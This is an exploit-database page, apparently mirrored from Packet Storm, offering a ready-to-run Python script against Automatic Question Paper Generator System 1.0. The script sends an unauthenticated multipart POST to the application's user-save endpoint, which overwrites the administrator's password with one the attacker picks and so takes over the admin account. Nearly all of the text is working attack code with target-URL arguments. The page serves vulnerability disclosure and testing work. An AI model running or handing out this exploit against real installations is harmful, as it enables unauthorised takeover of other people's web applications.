Automatic Question Paper Generator System 1.0 Insecure Direct Object Reference exploit

Share

## https://sploitus.com/exploit?id=PACKETSTORM:166288 # Exploit Title: Automatic Question Paper Generator System 1.0 - Authentication Bypass # Date: 2022-04-03 # Exploit Author: Mr Empy # Software Link: https://www.sourcecodester.com/php/15190/automatic-question-paper-generator-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: Linux #!/usr/bin/env python3 import requests import random import string from requests_toolbelt import MultipartEncoder from time import sleep import argparse def banner(): print(''' ___ ____ ____ ______ / | / __ \ / __ \/ ____/ / /| |/ / / / / /_/ / / __ / ___ / /_/ / / ____/ /_/ / /_/ |_\___\_\/_/ \____/ [Automatic Question Paper Generator v1.0] [Authentication Bypass] ''') def main(): fields = { 'id': "1", 'firstname': 'Adminstrator', 'lastname': 'Admin', 'username': 'admin', 'password': arguments.newpassword } boundary = '----WebKitFormBoundary' + ''.join(random.sample(string.ascii_letters + string.digits, 16)) m = MultipartEncoder(fields=fields, boundary=boundary) headers = { "Connection": "keep-alive", "Content-Type": m.content_type } r = requests.post(f'{arguments.url}/classes/Users.php?f=save', headers=headers, data=m) if '1' in r.text: print(f'[+] Account taken successfully! Login: admin:{arguments.newpassword}') else: print('[-] Not vulnerable') if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-u','--url', action='store', help='Target URL ( http://target.com/aqpg/)', dest='url', required=True) parser.add_argument('-p','--password', action='store', help='New password', dest='newpassword', required=True) arguments = parser.parse_args() banner() sleep(2) main()